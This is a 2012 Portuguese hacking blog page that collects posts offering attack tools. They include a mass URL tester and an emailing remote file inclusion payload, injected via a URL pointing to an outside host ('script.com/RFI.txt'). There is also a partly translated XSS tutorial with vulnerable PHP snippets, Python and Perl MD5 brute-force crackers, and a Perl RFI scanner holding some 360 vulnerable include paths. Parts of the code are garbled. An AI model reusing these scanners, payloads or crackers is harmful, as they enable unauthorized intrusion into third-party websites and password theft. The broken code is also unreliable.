Parceiro: Camisetas Hacker

Camisetas para Nerds & Hackers

Mostrando postagens com marcador script. Mostrar todas as postagens
Mostrando postagens com marcador script. Mostrar todas as postagens

terça-feira, 28 de agosto de 2012

Script Para teste URL + CMD


Script Para teste URL + CMD

Script PHP com intuito de testar varias URL ao mesmo tempo, simulando uma requisição http Método GET.
Definindo o Arquivo TXT que contem as URL por padrão devem sem uma embaixo da outra
Ex:
http://site01.com.br/index.php?id=
http://site02.com.br/index.php?main=
http://site03.com.br/index.php?ok=
...Assim por diante.

Seu script de Teste pode ser um pbot enfim fica da sua escolha.
Existe um script Testing RFI Send envia sites vulneráveis para seu e-mails
Script teste: http://pastebin.com/krZi3W8E

GoogleINURL - Brasil pesquisa avançada.
Grupo voltado a busca detalhada no motor de pesquisa google. Utilizando operadores especiais google O que é Google hacking?
É uma pirataria de informática técnica que utiliza o
Google Search e outras Google aplicativos para encontrar falhas de segurança
na configuração e código de computador.

SCRIPT PARA ESTUDOS.

By GoogleINURL
blog.inurl.com.br



segunda-feira, 27 de agosto de 2012

Script Para teste RFI vulneráveis enviados para Email.



Script Para teste RFI vulneráveis enviados para Email.

Pode ser usada em Bot Scanner, Xroot e outros programas que simulação alguma requisição http assim injetando o script na URL. já testa e envia pro Email.

Quem já usou o Xroot sabe como usar, Ou até mesmo um simples script de Spammer.

Exemplo:http://www.sitevul.com.br/index.php?id=http://script.com/RFI.txt?

Chegara da seguinte forma no seu email:

Nome: Linux a1-whl-a79.host.teste 2.6.18-194.32.1.el5 #1 SMP Fri Jan 7 11:50:24 BRST 2011 x86_64
Safe Mode:Off
URL: www.sitevul.com.br/index.php?id=http://script.com/RFI.txt?
Data: 07-31-33, 27-08-12, 3131 3133 1 Monpm12 239
Caminho: /home/sitevull/public_html/index.php
System: Linux a1-whl-a79.host.teste 2.6.18-194.32.1.el5 #1 SMP Fri Jan 7 11:50:24 BRST 2011 x86_64


Imagina testar isso um por um com lista de 1500 sites.

Dica use o Xroot ou outro programa que simule uma requisição HTTP pra injetar o script na Get do site:


OBS: procure a variável chamada Email troque o valor fixo que seria meu Email pelo seu.

Code:

quinta-feira, 5 de julho de 2012

Cross-site scripting (XSS) por Ahmed Elhady Mohamed


Introdução

[+] XSS por Wikipédia

Cross-site scripting (XSS) é um tipo de vulnerabilidade do sistema de segurança de um computador, encontrado normalmente em aplicações web que ativam ataques maliciosos ao injetarem client-side script dentro das páginas web vistas por outros usuários. Um script de exploração de vulnerabilidade cross-site pode ser usado pelos atacantes para escapar aos controles de acesso que usam a mesma política de origem.

[+] XSS é perigoso?

Sim, XSS é realmente perigoso, é de alta gravidade, porque ele poderia mudar o site e roubar as credenciais de administrador, nestes casos, o invasor pode controlar e comprometer o aplicativo.
Eu nunca tinha dado tanta importância para o XSS até ver uma palestra na CPBR5 que falava das 10 ameaças da OWASP mais usadas, vi coisas realmente incríveis com o XSS até mesmo roubo de sessões.

[+] O Que o atacante quer alcançar?

- Alterar configurações
- Roubar cookies
- Fazer uma publicação falsa
- Realizar roubos de Tokens para ataque CSRF

[+] Tipos de Ataques XSS

Persistent (stored) XSS
O ataque é armazenado no site.
Non persistent  (reflect) XSS
Usuário tem que ir através de um link especial para ser explorado.
DOM-based  XSS
problema existe dentro do script do lado do cliente
Vamos discutir cada tipo destes ataques em detalhes.

[+] Persistent (stored) XSS

O persistent (or stored) vulnerability XSS é uma variante mais devastadora da falha de cross-site scripting, ela ocorre quando os dados fornecidos pelo atacante é salvo pelo servidor e em seguida permanentemente exibida nas páginas retornadas para outros usuários na exibição regular da navegação. Um exemplo clássico disso é com quadros de mensagens de forum onde os usuários tem permissões para postar mensagens formatadas em HTML para que outros usuários possam ler.
Persistent XSS simplesmente ocorre quando o desenvolvedor armazena os dados de entrada do usuário no banco de dados ou simplesmente o escreve em um arquivo sem uma filtragem adequada, em seguida, envia-os novamente para os usuários.

[+] Exemplo de persistent XSS em PHP

'.mysql_error().'
'); } ?>
Os dois parâmetros em que o código ”message” e ”name” não são higienizados adequadamente e assim nós armazenamos estes parâmetros para a tabela no guestbook(livro de visitas), portanto, quando a exibição desses parâmetros voltar ao navegador do cliente, ele irá executar o código JavaScript malicioso.
Cross-site scripting (XSS) por Ahmed Elhady Mohamed
< –
Dentro da caixa de texto vulnerável foi inserido um código em java script malicioso.
– >
Assim que o código é executado olha o resultado:

Cross-site scripting (XSS) por Ahmed Elhady Mohamed

[+] Non Persistent (Reflected) XSS

A definição non persistent (ou reflected) XSS é de longe o tipo mais comum. Estes buracos aparecem quando os dados fornecidos por um cliente web, mais comumente em parâmetros de consulta HTTP ou envios de formulários HTML, é usado imediatamente por scripts do servidor para gerar uma página de resultados para o usuário, sem a correta higienização do pedido.

[+] Exemplo de non persistent XSS em PHP

'; 
echo 'Hello' . $_GET['name']; 
echo '
'; } ?>
Como você pode ver, o “name” é um parâmetro não higienizado e retornara para o usuário, assim quando o usuário injetar um código malicioso em JS ele será executado.
Vamos injetar o código   e vejamos o que vai acontecer.
Assim que inserimos o código no campo vulnerável ele retorna o erro e notem que na barra de navegação do browser que ele vai mostrar o código digitado também.
.
.
.
.
.
O restante do artigo fiquei com um pouco de preguiça de traduzir, mas é um bom artigo e vale a pena se visualizado.
Segue o link do PDF http://www.exploit-db.com/wp-content/themes/exploit/docs/18895.pdf



Fonte: http://unknownantisec.wordpress.com/2012/05/20/cross-site-scripting-xss-por-ahmed-elhady-mohamed/

domingo, 14 de agosto de 2011

[Perl] MD5 Brute forcer

 [Perl] MD5 Brute forcer
#MD5 Cracker (GUI Version)
#d3hydr8[at]gmail[dot]com
#http://www.darkc0de.com

from Tkinter import *
import tkFileDialog, md5

class Application(Frame):
    def __init__(self, master):
        Frame.__init__(self, master)
        self.grid()
        self.create_widget()
    def create_widget(self):
       
        self.lbl = Label(self, text = "ENTER MD5: ")
        self.lbl.grid(row = 2, column = 0, sticky = E)
       
        self.pw_ent = Entry(self, width = 32)
        self.pw_ent.grid(row = 2, column = 1, sticky = E)
       
        self.submit_bttn = Button(self, text = "Choose Wordlist", command = self.loadwords)
        self.submit_bttn.grid(row = 5, column = 1, sticky = W)
       
        self.txtbox = Text(self, width = 55, height = 8, font=('Georgia', 8), bg = "#CCC", wrap = WORD)
        self.txtbox.grid(row = 7, column = 0, columnspan = 2, sticky = W)

        self.bttn1 = Button(self, text = "Crack", font=('courier', 10, 'bold'), command = self.crack)
        self.bttn1.grid(row = 9, columnspan = 2, sticky = "WE")
   
        self.clear = Button(self, text="Clear", font=('Georgia', 8), command = self.clear)
        self.clear.grid(row = 10, column = 1,sticky= E)
       
    def loadwords(self):
        global wordlist
        file = tkFileDialog.askopenfile(parent=root,mode='r',title='Choose a file')
        wordlist = file.readlines()
        self.txtbox.insert(END, "Loaded: "+str(len(wordlist))+" words")
       
    def crack(self):
        pw = self.pw_ent.get()
        if len(pw) == 32:
            self.txtbox.insert(END, "\nCracking: "+pw)
            for word in wordlist:
                hash = md5.new(word.replace("\n","")).hexdigest()
                if pw == hash:
                    self.txtbox.insert(END, "\n\nCracked: "+word)
                    break
            self.txtbox.insert(END, "\nComplete")
        else:
            self.txtbox.insert(END, "\nImproper MD5 Length: "+str(len(pw)))
           
    def clear(self):
        self.pw_ent.delete(0, END)
           self.txtbox.delete(0.0, END)
        wordlist = []
       
root = Tk()
root.title("MD5 Cracker")
root.geometry("350x200")
app = Application(root)
root.mainloop()

[Perl] MD5 Brute forcer

 [Perl] MD5 Brute forcer
 #!/usr/bin/perl

# use strict; Sorry next time i'll use it ;)
# MD5 Hash Bruteforce Kit
# by Iman Karim ([email protected])
# URL : http://home.inf.fh-rhein-sieg.de/~ikarim2s/
# Date : 11.02.2007
# Info[0] : This Cracker is by far not the fastest! But it helped me alot to find "lost" passwords ;)
# Info[1] : Written under Kubuntu Linux (Throw away Windows!)
# Info[2] : If you can code a bit perl, you can modify it to crack sha etc too...
# Greets to: Invisible!

$ver = "01";

$dbgtmr = "1"; #Intervall of showing the current speed + lastpassword in seconds.



if ($dbgtmr<=0){ die "Set dbgtmr to a value >=1 !\n";};
use Digest::MD5 qw(md5_hex);
use Time::HiRes qw(gettimeofday);

if ($ARGV[0]=~"a") {
$alpha = "abcdefghijklmnopqrstuvwxyz";}
if ($ARGV[0]=~"A") {
$alpha = $alpha. "ABCDEFGHIJKLMNOPQRSTUVWXYZ";}
if ($ARGV[0]=~"d") {
$alpha = $alpha."1234567890";}

if ($ARGV[0]=~"x") {

$alpha = $alpha. "!\"\$%&/()=?-.:\\*'-_:.;,";}

if ($alpha eq "" or $ARGV[3] eq "") {usage();};
if (length($ARGV[3]) != 32) { die "Sorry but it seems that the MD5 is not valid!\n";};

print "Selected charset for attack: '$alpha\'\n";
print "Going to Crack '$ARGV[3]'...\n";

for (my $t=$ARGV[1];$t<=$ARGV[2];$t++){
crack ($t);
}

sub usage{
print "\n\nMD5 Hash Bruteforce Kit v_$ver\n";
print "by Iman Karim (iman.karim\@smail.inf.fh-bonn-rhein-sieg.de)\n";
print "http:\/\/home.inf.fh-rhein-sieg.de\/~ikarim2s\/\n\n";
print "USAGE\n";

print "./md5crack \n";
print " Charset can be: [aAdx]\n";
print " a = {'a','b','c',...}\n";
print " A = {'A','B','C',...}\n";
print " d = {'1','2','3',...}\n";
print " x = {'!','\"',' ',...}\n";
print "EXAMPLE FOR CRACKING A MD5 HASH\n";
print "./md5crack.pl ad 1 3 900150983cd24fb0d6963f7d28e17f72\n";
print " This example tries to crack the given MD5 with all lowercase Alphas and all digits.\n";
print " MD5 Kit only tries combinations with a length from 1 and 3 characters.\n-------\n";
print "./md5crack.pl aA 3 3 900150983cd24fb0d6963f7d28e17f72\n";
print " This example tries to crack the given MD5 with all lowercase Alphas and all uppercase Alphas.\n";
print " MD5 Kit only tries passwords which length is exactly 3 characters.\n-------\n";
print "./md5crack.pl aAdx 1 10 900150983cd24fb0d6963f7d28e17f72\n";
print " This example tries to crack the given MD5 with nearly every character.\n";
print " MD5 Kit only tries combinations with a length from 1 to 10 characters.\n";
die "Quitting...\n";

}

sub crack{
$CharSet = shift;
@RawString = ();
for (my $i =0;$i<$CharSet;$i++){ $RawString[i] = 0;}

$Start = gettimeofday();
do{
  for (my $i =0;$i<$CharSet;$i++){
   if ($RawString[$i] > length($alpha)-1){
    if ($i==$CharSet-1){
    print "Bruteforcing done with $CharSet Chars. No Results.\n";
    $cnt=0;
    return false;
   }
   $RawString[$i+1]++;
   $RawString[$i]=0;
   }
  }

###################################################

   $ret = "";
   for (my $i =0;$i<$CharSet;$i++){ $ret = $ret . substr($alpha,$RawString[$i],1);}
   $hash = md5_hex($ret);
   $cnt++;
   $Stop = gettimeofday();
   if ($Stop-$Start>$dbgtmr){
    $cnt = int($cnt/$dbgtmr);
    print "$cnt hashes\\second.\tLast Pass '$ret\'\n";
    $cnt=0;
    $Start = gettimeofday();
   }
            print "$ARGV[3] != $hash ($ret)\n";
   if ($ARGV[3] eq $hash){
    die "\n**** Password Cracked! => $ret\n";
   }

###################################################

  #checkhash($CharSet)."\n";

  $RawString[0]++;
}while($RawString[$CharSet-1]
$dbgtmr){="" (my="" .="" ;="" <="" checkhash{="" cracked!=">" eq="" for="" hashes\\second.\tlast="" if="" length($alpha));="" pass="" password="" sub="" substr($alpha,$rawstring[$i],1);}="" yourmd5="" }<="" }="">

Scritp [Perl] RFI Scanner.

Scanner [Perl] RFI Scanner

 

#!/usr/bin/perl
#Scan a host for rfi vulnerability
# by priv8, senk0 version
use HTTP::Request;
use LWP::UserAgent;

&inizio;
sub inizio{
print q(
  ###########################
   Rfi vulnerability scanner
   by nobody, senk0 version
  ###########################
);
print "\n Insert host:(ex: http://www.site.com/)\n";
$host=;
chomp($host);
print "Ok lets scan..\n";
$rfi1="includes/header.php?systempath=";
$rfi2="Gallery/displayCategory.php?basepath=";
$rfi3="index.inc.php?PATH_Includes=";
$rfi4="nphp/nphpd.php?nphp_config[LangFile]=";
$rfi5="include/db.php?GLOBALS[rootdp]=";
$rfi6="ashnews.php?pathtoashnews=";
$rfi7="ashheadlines.php?pathtoashnews=";
$rfi8="modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=";
$rfi9="demo/includes/init.php?user_inc=";
$rfi10="jaf/index.php?show=";
$rfi11="inc/shows.inc.php?cutepath=";
$rfi12="poll/admin/common.inc.php?base_path=";
$rfi13="pollvote/pollvote.php?pollname=";
$rfi14="sources/post.php?fil_config=";
$rfi15="modules/My_eGallery/public/displayCategory.php?basepath=";
$rfi16="bb_lib/checkdb.inc.php?libpach=";
$rfi17="include/livre_include.php?no_connect=lol&chem_absolu=";
$rfi18="index.php?from_market=Y&pageurl=";
$rfi19="modules/mod_mainmenu.php?mosConfig_absolute_path=";
$rfi20="pivot/modules/module_db.php?pivot_path=";
$rfi21="modules/4nAlbum/public/displayCategory.php?basepath=";
$rfi22="derniers_commentaires.php?rep=";
$rfi23="modules/coppermine/themes/default/theme.php?THEME_DIR=";
$rfi24="modules/coppermine/include/init.inc.php?CPG_M_DIR=";
$rfi25="modules/coppermine/themes/coppercop/theme.php?THEME_DIR=";
$rfi26="coppermine/themes/maze/theme.php?THEME_DIR=";
$rfi28="allmylinks/include/footer.inc.php?_AMLconfig[cfg_serverpath]=";
$rfi29="allmylinks/include/info.inc.php?_AMVconfig[cfg_serverpath]=";
$rfi30="myPHPCalendar/admin.php?cal_dir=";
$rfi31="agendax/addevent.inc.php?agendax_path=";
$rfi32="modules/mod_mainmenu.php?mosConfig_absolute_path=";
$rfi33="modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=";
$rfi34="main.php?page=";
$rfi35="default.php?page=";
$rfi36="index.php?action=";
$rfi37="index1.php?p=";
$rfi38="index2.php?x=";
$rfi39="index2.php?content=";
$rfi40="index.php?conteudo=";
$rfi41="index.php?cat=";
$rfi42="include/new-visitor.inc.php?lvc_include_dir=";
$rfi43="modules/agendax/addevent.inc.php?agendax_path=";
$rfi44="shoutbox/expanded.php?conf=";
$rfi45="modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=";
$rfi46="pivot/modules/module_db.php?pivot_path=";
$rfi47="library/editor/editor.php?root=";
$rfi48="library/lib.php?root=";
$rfi49="e107/e107_handlers/secure_img_render.php?p=";
$rfi50="zentrack/index.php?configFile=";
$rfi51="main.php?x=";
$rfi52="becommunity/community/index.php?pageurl=";
$rfi53="GradeMap/index.php?page=";
$rfi54="phpopenchat/contrib/yabbse/poc.php?sourcedir=";
$rfi55="calendar/calendar.php?serverPath=";
$rfi56="calendar/functions/popup.php?serverPath=";
$rfi57="calendar/events/header.inc.php?serverPath=";
$rfi58="calendar/events/datePicker.php?serverPath=";
$rfi59="calendar/setup/setupSQL.php?serverPath=";
$rfi60="calendar/setup/header.inc.php?serverPath=";
$rfi61="mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=";
$rfi62="zentrack/index.php?configFile=";
$rfi63="pivot/modules/module_db.php?pivot_path=";
$rfi64="inc/header.php/step_one.php?server_inc=";
$rfi65="install/index.php?lng=../../include/main.inc&G_PATH=";
$rfi66="inc/pipe.php?HCL_path=";
$rfi67="include/write.php?dir=";
$rfi68="include/new-visitor.inc.php?lvc_include_dir=";
$rfi69="includes/header.php?systempath=";
$rfi70="support/mailling/maillist/inc/initdb.php?absolute_path=";
$rfi71="coppercop/theme.php?THEME_DIR=";
$rfi72="zentrack/index.php?configFile=";
$rfi73="pivot/modules/module_db.php?pivot_path=";
$rfi74="inc/header.php/step_one.php?server_inc=";
$rfi75="install/index.php?lng=../../include/main.inc&G_PATH=";
$rfi76="inc/pipe.php?HCL_path=";
$rfi77="include/write.php?dir=";
$rfi78="include/new-visitor.inc.php?lvc_include_dir=";
$rfi79="includes/header.php?systempath=";
$rfi80="support/mailling/maillist/inc/initdb.php?absolute_path=";
$rfi81="coppercop/theme.php?THEME_DIR=";
$rfi82="becommunity/community/index.php?pageurl=";
$rfi83="shoutbox/expanded.php?conf=";
$rfi84="agendax/addevent.inc.php?agendax_path=";
$rfi85="myPHPCalendar/admin.php?cal_dir=";
$rfi86="yabbse/Sources/Packages.php?sourcedir=";
$rfi87="dotproject/modules/projects/addedit.php?root_dir=";
$rfi88="dotproject/modules/projects/view.php?root_dir=";
$rfi89="dotproject/modules/projects/vw_files.php?root_dir=";
$rfi90="dotproject/modules/tasks/addedit.php?root_dir=";
$rfi91="dotproject/modules/tasks/viewgantt.php?root_dir=";
$rfi92="My_eGallery/public/displayCategory.php?basepath=";
$rfi93="modules/My_eGallery/public/displayCategory.php?basepath=";
$rfi94="modules/4nAlbum/public/displayCategory.php?basepath=";
$rfi95="modules/coppermine/themes/default/theme.php?THEME_DIR=";
$rfi96="modules/agendax/addevent.inc.php?agendax_path=";
$rfi97="modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=";
$rfi98="modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=";
$rfi99="modules/coppermine/include/init.inc.php?CPG_M_DIR=";
$rfi100="modules/mod_mainmenu.php?mosConfig_absolute_path=";
$rfi101="shoutbox/expanded.php?conf=";
$rfi102="pivot/modules/module_db.php?pivot_path=";
$rfi103="library/editor/editor.php?root=";
$rfi104="library/lib.php?root=";
$rfi105="e107/e107_handlers/secure_img_render.php?p=";
$rfi106="main.php?x=";
$rfi107="main.php?page=";
$rfi108="index.php?meio.php=";
$rfi109="index.php?include=";
$rfi110="index.php?inc=";
$rfi111="index.php?page=";
$rfi112="index.php?pag=";
$rfi113="index.php?p=";
$rfi114="index.php?x=";
$rfi115="index.php?open=";
$rfi116="index.php?visualizar=";
$rfi117="index.php?pagina=";
$rfi118="index2.php?content=";
$rfi119="inc/step_one_tables.php?server_inc=";
$rfi120="GradeMap/index.php?page=";
$rfi121="phpshop/index.php?base_dir=";
$rfi122="admin.php?cal_dir=";
$rfi123="contacts.php?cal_dir=";
$rfi124="convert-date.php?cal_dir=";
$rfi125="album_portal.php?phpbb_root_path=";
$rfi126="mainfile.php?MAIN_PATH=";
$rfi127="dotproject/modules/files/index_table.php?root_dir=";
$rfi128="html/affich.php?base=";
$rfi129="gallery/init.php?HTTP_POST_VARS=";
$rfi130="pm/lib.inc.php?pm_path=";
$rfi131="ideabox/include.php?gorumDir=";
$rfi132="index2.php?includes_dir=";
$rfi133="forums/toplist.php?phpbb_root_path=";
$rfi134="forum/toplist.php?phpbb_root_path=";
$rfi135="admin/config_settings.tpl.php?include_path=";
$rfi136="include/common.php?include_path=";
$rfi137="event/index.php?page=";
$rfi138="forum/index.php?includeFooter=";
$rfi139="forums/index.php?includeFooter=";
$rfi140="forum/bb_admin.php?includeFooter=";
$rfi141="forums/bb_admin.php?includeFooter=";
$rfi142="language/lang_english/lang_activity.php?phpbb_root_path=";
$rfi143="forum/language/lang_english/lang_activity.php?phpbb_root_path=";
$rfi144="blend_data/blend_common.php?phpbb_root_path=";
$rfi145="master.php?root_path=";
$rfi146="includes/kb_constants.php?module_root_path=";
$rfi147="forum/includes/kb_constants.php?module_root_path=";
$rfi148="forums/includes/kb_constants.php?module_root_path=";
$rfi149="classes/adodbt/sql.php?classes_dir=";
$rfi150="agenda.php3?rootagenda=";
$rfi151="agenda2.php3?rootagenda=";
$rfi152="sources/lostpw.php?CONFIG[path]=";
$rfi153="topsites/sources/lostpw.php?CONFIG[path]=";
$rfi154="toplist/sources/lostpw.php?CONFIG[path]=";
$rfi155="sources/join.php?CONFIG[path]=";
$rfi156="topsites/sources/join.php?CONFIG[path]=";
$rfi157="toplist/sources/join.php?CONFIG[path]=";
$rfi158="topsite/sources/join.php?CONFIG[path]=";
$rfi159="public_includes/pub_popup/popup_finduser.php?vsDragonRootPath=";
$rfi160="extras/poll/poll.php?file_newsportal=";
$rfi161="index.php?site_path=";
$rfi162="mail/index.php?site_path=";
$rfi163="fclick/show.php?path=";
$rfi164="show.php?path=";
$rfi165="calogic/reconfig.php?GLOBALS[CLPath]=";
$rfi166="eshow.php?Config_rootdir=";
$rfi167="auction/auction_common.php?phpbb_root_path=";
$rfi168="index.php?inc_dir=";
$rfi169="calendar/index.php?inc_dir=";
$rfi170="modules/TotalCalendar/index.php?inc_dir=";
$rfi171="modules/calendar/index.php?inc_dir=";
$rfi172="calendar/embed/day.php?path=";
$rfi173="ACalendar/embed/day.php?path=";
$rfi174="calendar/add_event.php?inc_dir=";
$rfi175="claroline/auth/extauth/drivers/ldap.inc.php?clarolineRepositorySys=";
$rfi176="claroline/auth/ldap/authldap.php?includePath=";
$rfi177="docebo/modules/credits/help.php?lang=";
$rfi178="modules/credits/help.php?lang=";
$rfi179="config.php?returnpath=";
$rfi180="editsite.php?returnpath=";
$rfi181="in.php?returnpath=";
$rfi182="addsite.php?returnpath=";
$rfi183="includes/pafiledb_constants.php?module_root_path=";
$rfi184="phpBB/includes/pafiledb_constants.php?module_root_path=";
$rfi185="pafiledb/includes/pafiledb_constants.php?module_root_path=";
$rfi186="auth/auth.php?phpbb_root_path=";
$rfi187="auth/auth_phpbb/phpbb_root_path=";
$rfi188="apc-aa/cron.php3?GLOBALS[AA_INC_PATH]=";
$rfi189="apc-aa/cached.php3?GLOBALS[AA_INC_PATH]=";
$rfi190="infusions/last_seen_users_panel/last_seen_users_panel.php?settings[locale]=";
$rfi191="phpdig/includes/config.php?relative_script_path=";
$rfi192="includes/phpdig/includes/config.php?relative_script_path=";
$rfi193="includes/dbal.php?eqdkp_root_path=";
$rfi194="eqdkp/includes/dbal.php?eqdkp_root_path=";
$rfi195="dkp/includes/dbal.php?eqdkp_root_path=";
$rfi196="include/SQuery/gameSpy2.php?libpath=";
$rfi197="include/global.php?GLOBALS[includeBit]=";
$rfi198="topsites/config.php?returnpath=";
$rfi199="manager/frontinc/prepend.php?_PX_config[manager_path]=";
$rfi200="ubbthreads/addpost_newpoll.php?addpoll=thispath=";
$rfi201="forum/addpost_newpoll.php?thispath=";
$rfi202="forums/addpost_newpoll.php?thispath=";
$rfi203="ubbthreads/ubbt.inc.php?thispath=";
$rfi204="forums/ubbt.inc.php?thispath=";
$rfi205="forum/ubbt.inc.php?thispath=";
$rfi206="forum/admin/addentry.php?phpbb_root_path=";
$rfi207="admin/addentry.php?phpbb_root_path=";
$rfi208="index.php?f=";
$rfi209="index.php?act=";
$rfi210="ipchat.php?root_path=";
$rfi211="includes/orderSuccess.inc.php?glob[rootDir]=";
$rfi212="stats.php?dir[func]=dir[base]=";
$rfi213="ladder/stats.php?dir[base]=";
$rfi214="ladders/stats.php?dir[base]=";
$rfi215="sphider/admin/configset.php?settings_dir=";
$rfi216="admin/configset.php?settings_dir=";
$rfi217="vwar/admin/admin.php?vwar_root=";
$rfi218="modules/vwar/admin/admin.php?vwar_root=";
$rfi219="modules/vWar_Account/includes/get_header.php?vwar_root=";
$rfi220="modules/vWar_Account/includes/functions_common.php?vwar_root2=";
$rfi221="sphider/admin/configset.php?settings_dir=";
$rfi222="admin/configset.php?settings_dir=";
$rfi223="impex/ImpExData.php?systempath=";
$rfi224="forum/impex/ImpExData.php?systempath=";
$rfi225="forums/impex/ImpExData.php?systempath=";
$rfi226="application.php?base_path=";
$rfi227="index.php?theme_path=";
$rfi228="become_editor.php?theme_path=";
$rfi229="add.php?theme_path=";
$rfi230="bad_link.php?theme_path=";
$rfi231="browse.php?theme_path=";
$rfi232="detail.php?theme_path=";
$rfi233="fav.php?theme_path=";
$rfi234="get_rated.php?theme_path=";
$rfi235="login.php?theme_path=";
$rfi236="mailing_list.php?theme_path=";
$rfi237="new.php?theme_path=";
$rfi238="modify.php?theme_path=";
$rfi239="pick.php?theme_path=";
$rfi240="power_search.php?theme_path=";
$rfi241="rating.php?theme_path=";
$rfi242="register.php?theme_path=";
$rfi243="review.php?theme_path=";
$rfi244="rss.php?theme_path=";
$rfi245="search.php?theme_path=";
$rfi246="send_pwd.php?theme_path=";
$rfi247="sendmail.php?theme_path=";
$rfi248="tell_friend.php?theme_path=";
$rfi249="top_rated.php?theme_path=";
$rfi250="user_detail.php?theme_path=";
$rfi251="user_search.php?theme_path=";
$rfi252="invoice.php?base_path=";
$rfi253="cgi-bin//classes/adodbt/sql.php?classes_dir=";
$rfi254="cgi-bin/install/index.php?G_PATH=";
$rfi255="cgi-bin/include/print_category.php?dir=";
$rfi256="includes/class_template.php?quezza_root_path=";
$rfi257="bazar/classified_right.php?language_dir=";
$rfi258="classified_right.php?language_dir=";
$rfi259="phpBazar/classified_right.php?language_dir=";
$rfi260="chat/messagesL.php3?cmd=";
$rfi261="phpMyChat/chat/messagesL.php3?cmd=";
$rfi262="bbs/include/write.php?dir=";
$rfi263="visitorupload.php?cmd=";
$rfi264="modules/center/admin/accounts/process.php?module_path]=";
$rfi265="index.php?template=";
$rfi266="armygame.php?libpath=";
$rfi267="lire.php?rub=";
$rfi268="pathofhostadmin/?page=";
$rfi269="apa_phpinclude.inc.php?apa_module_basedir=";
$rfi270="index.php?req_path=";
$rfi271="research/boards/encapsbb-0.3.2_fixed/index_header.php?root=";
$rfi272="Farsi1/index.php?archive=";
$rfi273="index.php?archive=";
$rfi274="show_archives.php?template=";
$rfi275="forum/include/common.php?pun_root=";
$rfi276="pmwiki wiki/pmwiki-2.1.beta20/pmwiki.php?GLOBALS[FarmD]=";
$rfi277="vuln.php?=";
$rfi278="cgi-bin//include/write.php?dir=";
$rfi279="admin/common.inc.php?basepath=";
$rfi280="pm/lib.inc.php?sfx=";
$rfi281="pm/lib.inc.php?pm_path=";
$rfi282="artmedic-kleinanzeigen-path/index.php?id=";
$rfi283="osticket/include/main.php?include_dir=";
$rfi284="include/main.php?config[search_disp]=include_dir=";
$rfi285="phpcoin/config.php?_CCFG[_PKG_PATH_DBSE]=";
$rfi286="quick_reply.php?phpbb_root_path=";
$rfi287="zboard/include/write.php?dir=";
$rfi288="admin/plog-admin-functions.php?configbasedir=";
$rfi289="content.php?content=";
$rfi290="q-news.php?id=";
$rfi291="_conf/core/common-tpl-vars.php?confdir=";
$rfi292="votebox.php?VoteBoxPath=";
$rfi293="al_initialize.php?alpath=";
$rfi294="include/db.php?GLOBALS[rootdp]=";
$rfi295="modules/news/archivednews.php?GLOBALS[language_home]=";
$rfi296="protection.php?siteurl=";
$rfi297="modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=";
$rfi298="index2.php?includes_dir=";
$rfi299="classes.php?LOCAL_PATH=";
$rfi300="extensions/moblog/moblog_lib.php?basedir=";
$rfi301="modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=";
$rfi302="phpWebLog/include/init.inc.php?G_PATH=";
$rfi303="admin/objects.inc.php4?Server=";
$rfi304="trg_news30/trgnews/install/article.php?dir=";
$rfi305="block.php?Include=";
$rfi306="arpuivo.php?data=";
$rfi307="setup/index.php?GALLERY_BASEDIR=";
$rfi308="include/help.php?base=";
$rfi309="index.php?[Home]=";
$rfi310="block.php?Include=";
$rfi311="examples/phonebook.php?page=";
$rfi312="PHPNews/auth.php?path=";
$rfi313="include/print_category.php?dir=";
$rfi314="skin/zero_vote/login.php?dir=";
$rfi315="skin/zero_vote/setup.php?dir=";
$rfi316="skin/zero_vote/ask_password.php?dir=";
$rfi317="gui/include/sql.php?include_path=";
$rfi318="webmail/lib/emailreader_execute_on_each_page.inc.php?emailreader_ini=";
$rfi319="email.php?login=cer_skin=";
$rfi320="PhotoGal/ops/gals.php?news_file=";
$rfi321="index.php?custom=";
$rfi322="loginout.php?cutepath=";
$rfi323="oneadmin/config.php?path[docroot]=";
$rfi324="xcomic/initialize.php?xcomicRootPath=";
$rfi325="skin/zero_vote/setup.php?dir=";
$rfi326="skin/zero_vote/error.php? dir=";
$rfi327="admin_modules/admin_module_captions.inc.php?config[path_src_include]=";
$rfi328="admin_modules/admin_module_rotimage.inc.php?config[path_src_include]=";
$rfi329="admin_modules/admin_module_delcomments.inc.php?config[path_src_include]=";
$rfi330="admin_modules/admin_module_edit.inc.php?config[path_src_include]=";
$rfi331="admin_modules/admin_module_delimage.inc.php?config[path_src_include]=";
$rfi332="admin_modules/admin_module_deldir.inc.php?config[path_src_include]=";
$rfi333="src/index_overview.inc.php?config[path_src_include]=";
$rfi334="src/index_leftnavbar.inc.php?config[path_src_include]=";
$rfi335="src/index_image.inc.php?config[path_src_include]=";
$rfi336="src/image-gd.class.php?config[path_src_include]=";
$rfi337="src/image.class.php?config[path_src_include]=";
$rfi338="src/album.class.php?config[path_src_include]=";
$rfi339="src/show_random.inc.php?config[path_src_include]=";
$rfi340="src/main.inc.php?config[path_src_include]=";
$rfi341="src/index_passwd-admin.inc.php?config[path_admin_include]=";
$rfi342="yappa-ng/src/index_overview.inc.php?config[path_src_include]=";
$rfi343="admin_modules/admin_module_captions.inc.php?config[path_src_include]=";
$rfi344="admin_modules/admin_module_rotimage.inc.php?config[path_src_include]=";
$rfi345="admin_modules/admin_module_delcomments.inc.php?config[path_src_include]=";
$rfi346="admin_modules/admin_module_edit.inc.php?config[path_src_include]=";
$rfi347="admin_modules/admin_module_delimage.inc.php?config[path_src_include]=";
$rfi348="admin_modules/admin_module_deldir.inc.php?config[path_src_include]=";
$rfi349="src/index_overview.inc.php?config[path_src_include]=";
$rfi350="src/image-gd.class.php?config[path_src_include]=";
$rfi351="src/image.class.php?config[image_module]=";
$rfi352="src/album.class.php?config[path_src_include]=";
$rfi353="src/show_random.inc.php?config[path_src_include]=";
$rfi353="src/main.inc.php?config[path_src_include]=";
$rfi354="includes/db_adodb.php?baseDir=";
$rfi355="includes/db_connect.php?baseDir=";
$rfi356="includes/session.php?baseDir=";
$rfi357="modules/projects/gantt.php?dPconfig[root_dir]=";
$rfi358="modules/projects/gantt2.php?dPconfig[root_dir]=";
$rfi359="modules/projects/vw_files.php?dPconfig[root_dir]=";
$rfi360="modules/admin/vw_usr_roles.php?baseDir=";
